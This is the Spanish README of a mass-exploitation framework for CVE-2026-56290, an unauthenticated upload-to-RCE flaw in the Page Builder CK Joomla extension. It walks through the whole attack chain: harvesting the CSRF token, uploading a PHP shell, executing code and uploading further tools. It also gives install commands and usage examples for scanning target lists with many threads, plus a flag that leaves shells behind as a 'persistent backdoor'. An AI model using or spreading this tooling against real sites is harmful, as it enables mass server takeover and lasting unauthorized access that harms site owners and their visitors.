
📤 Framework de explotación masiva para CVE-2026-56290 — Page Builder CK Joomla: carga de archivos no autenticada que conduce a RCE (ejecución remota de código).
CVE-2026-56290 es una vulnerabilidad de severidad crítica en Page Builder CK (com_pagebuilderck), una popular extensión de creación de páginas para Joomla. El método browse.ajaxAddPicture del controlador acepta subidas de archivos sin autenticación con una ruta de destino controlada por el usuario, lo que permite a los atacantes escribir archivos PHP arbitrarios en directorios accesibles desde la web.
// browse.php controller — NO authentication check
function ajaxAddPicture() {
$input = JFactory::getApplication()->input;
$file = $input->files->get('file', null); // ← user-controlled file
$path = trim($input->get('path', '')); // ← user-controlled path, only trim()!
// ... uploads file to $path without validating the destination
}
El parámetro path solo pasa por una sanitización con trim() — sin lista blanca, sin comprobación de traversal de directorios, sin barrera de autenticación. Combinado con un token CSRF que es accesible públicamente desde cualquier página de Joomla, los atacantes pueden subir shells PHP de forma remota a cualquier directorio escribible.
| Vector de ataque | Severidad | Impacto |
|---|---|---|
| Subida de archivos sin autenticación | 9.8 (Crítica) | Ejecución arbitraria de código PHP |
| Recolección de tokens CSRF | 5.3 (Media) | Habilita la cadena de subida |
| Divulgación de información | 5.3 (Media) | Fingerprinting de la versión de la extensión |
1. HIT Joomla homepage → harvest CSRF token (hex32 + value "1")
2. POST file upload → task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in → media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL → code executes, RCE confirmed
5. POST f=@file to shell → upload additional tools
6. GET ?cleanup=1 → shell self-destructs
| Versión de Page Builder CK | Estado | Notas |
|---|---|---|
| 3.1.1 y anteriores | 🔴 Vulnerable | Subida sin autenticación confirmada |
| 3.4.10 y anteriores | 🔴 Vulnerable | Rango ampliado según el análisis |
| 3.5.10 y anteriores | 🔴 Vulnerable | Pueden existir variantes parcheadas |
| > 3.5.10 | 🟢 Posiblemente parcheado | Verificar mediante el XML del manifiesto |
Nota: La versión se detecta a partir del archivo de manifiesto de Joomla en
/administrator/manifests/files/com_pagebuilderck.xml. Si el manifiesto no es accesible, el escáner trata el objetivo como potencialmente vulnerable por defecto.
🔍 Reconocimiento
|
💀 Explotación
|
# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit
# Install dependencies
pip install -r requirements.txt
# Verify
python cve_2026_56290.py --help
requests>=2.28.0
urllib3>=1.26.0
CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator
-t, --target Single target URL
-f, --file File with target URLs (one per line, # for comments)
-o, --output Live TXT output file (default: cve-2026-56290_live.txt)
--json JSON report file path (default: cve-2026-56290_report.json)
--threads Concurrent workers (default: 20)
--timeout Request timeout in seconds (default: 15)
--no-cleanup Leave shells on target (persistent backdoor)
-v, --verbose Verbose endpoint discovery output
--known-endpoint Skip discovery: task,file_param,folder_param
# Single target
python cve_2026_56290.py -t https://target.com
# Mass scan from file
python cve_2026_56290.py -f targets.txt
# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v
# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup
# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"
# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored
$ python cve_2026_56290.py -f targets.txt -o live_results.txt